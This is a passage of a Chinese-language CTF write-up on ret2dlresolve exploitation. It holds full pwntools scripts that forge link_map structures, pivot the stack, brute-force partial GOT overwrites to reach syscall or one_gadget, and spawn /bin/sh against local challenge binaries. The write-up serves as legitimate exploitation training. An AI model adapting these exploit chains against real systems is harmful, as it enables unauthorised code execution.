	target = fake_addr - 8 #the result you write in (any addr)
	fake_link_map = p64(offset & (2**64-1)) #l_addr
	fake_link_map = fake_link_map.ljust(0x30, b'\x00')
	fake_jmprel = p64(target-offset) #r_offset
	fake_jmprel += p64(7) #r_info
	fake_jmprel += p64(0) #r_append
	fake_link_map += fake_jmprel
	fake_link_map += b"/bin/sh\x00"
	fake_link_map = fake_link_map.ljust(0x58, b'\x00')
	return fake_link_map
def create_fake_link_map_2(fake_addr, known_got, reloc_index, offset):
	fake_link_map = p64(0) + p64(leave_ret)
	fake_link_map += p64(fake_addr) #l_info[5] dynstr
	fake_link_map += p64(fake_addr+0x78-8) #l_info[6] dynsym
	fake_link_map += p64(known_got-8) #dynmic symtabg
	fake_link_map += p64(fake_addr+0x30-0x18*reloc_index) #dynmic jmprel
	fake_link_map += b'\x00'*0x70
	return fake_link_map

fake_reloc_arg = 0 # just as one wishes
fake_link_map_addr = rop_addr + 0x48
fake_link_map_1 = create_fake_link_map_1(fake_link_map_addr, elf.got['read'],fake_reloc_arg, libc.sym['system'] - libc.sym['read'])
fake_link_map_2 = create_fake_link_map_2(fake_link_map_addr, elf.got['read'],fake_reloc_arg, libc.sym['system'] - libc.sym['read'])

# 栈迁移
payload= b'\x00'*0xa0 + p64(rop_addr+0xa0) + p64(main_read)
p.send(payload)

payload = p64(pop_rdi_ret) + p64(fake_link_map_addr+0x48)
payload += p64(plt0+6) + p64(fake_link_map_addr) + p64(fake_reloc_arg) +p64(0)*4 + fake_link_map_1
payload += p64(rop_addr+0xa0*2) + p64(main_read)# 0xb0
p.send(payload)

payload = fake_link_map_2 + p64(rop_addr+0xa0*3) + p64(main_read)# 0xb0
p.send(payload)

payload = p64(fake_link_map_addr+0x80-8) + p64(leave_ret) #l_info[23] jmprel
payload = payload.ljust(0xa0, b'\x00')
payload += p64(rop_addr - 0x8) + p64(leave_ret)
p.send(payload)
p.interactive()
```

## 非常规解法

还是上面那到例题，程序没有关闭输入输出流。程序调用setvbuf，我们利用其获得的真实地址与puts的真实地址仅后三位不同，爆破修改其got表，利用csu实现调用puts输出stdout地址以获得libc_base，直接onegadget

```python
from pwn import *
context(os='linux', arch='amd64', log_level='debug')

p = process("./checkin")
elf =ELF('./checkin')
libc = elf.libc

# gdb.attach(p)
payload = b"a"*0xa0 + p64(0x4040c0+0xa0) + p64(0x4011BF)  #buf = 0x4040c0
p.send(payload)

payload = flat([  #csu
    0x404140,    #no use
    0x40124A,  # pop 6
    0,1,      #rbx rbp
    0x404040, # stdout  r12
    0,0,    # r13 r14
    0x404020,  #r15 setvbuf_got
    0x401230,  # ret 
    0,0,   #+8 rbx
    0x404140, #rbp
    0,0,0,0, #12 13 14 15
    0x4011BF #read = put
    ])
payload = payload.ljust(0xa0,b"\x00") + p64(0x404020+0xa0) + p64(0x4011bf) #read 
p.send(payload)
sleep(0.1)

p.send(b"\x50\xc4")
sleep(0.1)
libc_base = u64(p.recvuntil(b"\x7f")[-6:].ljust(8,"\x00")) -0x1ed6a0

success("libc_base:"+hex(libc_base))

p.send(b"a"*0xa0 +p64(libc_base+0xe3b2e)*2 ) 

p.interactive()

```

又比如像这种明显ret2dl的题，输出流和错误流全关，防止常规ROP

![image-20220402232255605](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220402232255605.png)

read函数结束后，rax寄存器（即函数返回值）为读取的字符串长度。因此，我们可以通过控制字符串的读取来达到控制rax寄存器的目的。至于syscall，则可以由地位覆盖read或者close等函数的got表来实现。

&read+0xF和&close+0x12即为syscall，并且根据libc库函数地址后三位固定的特点，直接将函数got表低位覆盖即可以获得syscall之后就是常规的csu一把梭了，注意读取需要控制缓冲区

就是爆破有点不好出这个

```python
from pwn import*
# context(os='linux',arch='amd64',log_level='debug')

read_got=0x404028
close_got=0x404020
pop_rdi=0x401223

main=0x401176
csu1=0x40121A
csu2=0x401200
def pwn():
    r.recvline()
    payload=''
    payload+=p64(csu1)
    payload+=p64(0)
    payload+=p64(1)
    payload+=p64(0)
    payload+=p64(close_got)
    payload+=p64(1)
    payload+=p64(read_got)
    payload+=p64(csu2)
    payload+='a'*0x8
    payload+=p64(0)
    payload+=p64(1)
    payload+=p64(0)
    payload+=p64(0x404200)
    payload+=p64(59)
    payload+=p64(read_got)
    payload+=p64(csu2)
    payload+='a'*0x8
    payload+=p64(0)
    payload+=p64(1)
    payload+=p64(0x404200)
    payload+=p64(0)
    payload+=p64(0)
    payload+=p64(close_got)
    payload+=p64(csu2)
    r.send(('\x00'*0x28+payload).ljust(0x200,'\x00'))
    sleep(0.1)
    r.send('\xe2')
    sleep(0.1)
    r.send('/bin/sh\x00'+'a'*0x33)
    r.interactive()

times = 0
while 1:
    try:
        r=process('./test')
        pwn()
    except:
        times += 1
        print("="*8+str(times)+" times"+"="*8)
        r.close()
```

这里再贴一下ret2dl的解法

```python
from pwn import*
context(os='linux', arch='amd64', log_level='debug')

p = process("./test")
elf = ELF("./test")
libc = elf.libc

plt0 = elf.get_section_by_name('.plt').header.sh_addr
pop_rdi_ret = 0x401223
pop_rsi_r15_ret = 0x401221
ret = 0x4011BE

def create_fake_link_map(fake_addr, known_got, reloc_index, offset):
    target = fake_addr - 8   #the result you write in (any addr)
    fake_link_map = p64(offset & (2**64-1))   #l_addr
    fake_link_map = fake_link_map.ljust(0x30, b'\x00')
    fake_jmprel = p64(target-offset)   #r_offset
    fake_jmprel += p64(7)   #r_info
    fake_jmprel += p64(0)   #r_append
    fake_link_map += fake_jmprel
    fake_link_map = fake_link_map.ljust(0x68, b'\x00')
    fake_link_map += p64(fake_addr)   #l_info[5] dynstr
    fake_link_map += p64(fake_addr+0x78-8)   #l_info[6] dynsym
    fake_link_map += p64(known_got-8)   #dynmic symtab
    fake_link_map += p64(fake_addr+0x30-0x18*reloc_index)   #dynmic jmprel
    fake_link_map = fake_link_map.ljust(0xf8, b'\x00')
    fake_link_map += p64(fake_addr+0x80-8)   #l_info[23] jmprel
    return fake_link_map

fake_reloc_arg = 0  #just as one wishes
fake_link_map_addr = 0x404050
fake_link_map = create_fake_link_map(fake_link_map_addr, elf.got['read'], fake_reloc_arg, libc.sym['system'] - libc.sym['read'])
bin_sh_addr = fake_link_map_addr + len(fake_link_map)

payload = b'\x00'*0x28 + p64(pop_rdi_ret) + p64(0) + p64(pop_rsi_r15_ret) + p64(fake_link_map_addr) + p64(0) + p64(elf.plt['read'])
payload += p64(ret) + p64(pop_rdi_ret) + p64(bin_sh_addr) + p64(plt0+6) + p64(fake_link_map_addr) + p64(fake_reloc_arg)
payload = payload.ljust(0x200, b'\x00')
p.sendafter("something:\n", payload)

payload = fake_link_map + b'/bin/sh\x00'
gdb.attach(p)
p.send(payload)
p.interactive()
```

## 总结

|              | 修改 dynamic 节的内容 | 修改重定位表项的位置                                         | 伪造 linkmap                                         |
| :----------- | :-------------------- | :----------------------------------------------------------- | :--------------------------------------------------- |
| 主要前提要求 | 无                    | 无                                                           | 无信息泄漏时需要 libc                                |
| 适用情况     | NO RELRO              | NO RELRO, Partial RELRO                                      | NO RELRO, Partial RELRO                              |
| 注意点       |                       | 确保版本检查通过；确保重定位位置可写；确保重定位表项、符号表、字符串表一一对应 | 确保重定位位置可写；需要着重伪造重定位表项、符号表； |

